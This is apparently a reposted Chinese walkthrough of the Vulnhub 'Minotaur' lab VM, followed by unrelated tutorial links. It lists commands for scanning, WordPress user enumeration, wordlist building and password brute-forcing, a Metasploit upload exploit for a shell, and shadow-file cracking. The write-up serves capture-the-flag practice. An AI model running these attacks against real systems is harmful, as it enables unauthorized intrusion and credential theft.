【Vulnhub】SecTalks: BNE0x00 - Minotaur
时间:2022-07-25
本文章向大家介绍【Vulnhub】SecTalks: BNE0x00 - Minotaur,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
扫不到 IP 按照之前的方法,但是这里是 dhcp 被注释掉了
把那些白的删掉,箭头指向的那一行的注释去掉
nmap -p- -A 192.168.149.196
ftp 匿名登录进去啥都没有
80 端口有个 apache 的默认页面
然后扫描目录扫出来一个 bull,访问是一个 wordpress 的博客,扫描一波,出来个用户名 bully
wpscan --url http://192.168.149.196/bull/ -eu
然后爆破一下(字典用 cewl 获取页面上的内容)
cewl -w words.txt -m 6 http://192.168.149.196/bull/
-m 这个参数指定的是长度
john --wordlist=words.txt --rules --stdout > words-john.txt
john 处理一下,生成一些组合出来的
wpscan --url http://192.168.149.196/bull/ --passwords ./words-john.txt -U bully
然后用组合出来的字典跑出来 bully 账户密码为 Bighornedbulls
然后可以用 msf 直接来拿 shell
use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST 192.168.149.196
set TARGETURI /bull/
set WP_USER bully
set WP_PASSWORD Bighornedbulls
在 /var/www/html 目录下有个 flag
/tmp 目录下也有,同时还有个 shadow.bak
保存出来用 john 暴力跑一下,得到:
切换用户 heffer 在用户目录得到一个 flag
切换 minotaur 同样在用户目录得到一个 flag
用 sudo -l 查看一下发现可以用 sudo 执行任意的命令?
- 在java中使用redis
- springmvc学习笔记--json--返回json的日期格式问题
- springmvc学习笔记--mybatis--使用插件自动生成实体和mapper
- velocity的一些用法
- String.split()用法以及特殊分隔符注意,ps:|
- Mybatis在idea中错误:Invalid bound statement (not found)
- java字符编码和oracle乱码
- ehcache报错
- java继承覆盖与向上转型,权限
- java变量的加载顺序
- java类的初始化和对象的创建顺序
- 附近的人位置距离计算方法
- java中复制对象通过反射或序列化
- Java String.split()用法小结
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- laravel通用化的CURD的实现
- Laravel修改验证提示信息为中文的示例
- PHP+redis实现微博的推模型案例分析
- Laravel 解决composer相关操作提示php相关异常的问题
- laravel 实现根据字段不同值做不同查询
- php实现获取近几日、月时间示例
- PHP+redis实现微博的拉模型案例详解
- PHP实现微信申请退款功能
- Laravel+Intervention实现上传图片功能示例
- 关于laravel框架中的常用目录路径函数
- Java byte数组操纵方式代码实例解析
- php桥接模式应用案例分析
- PHP设计模式之中介者模式(Mediator Pattern)入门与应用案例详解
- laravel 出现command not found问题的解决方案
- PHP怎么搭建百度Ueditor富文本编辑器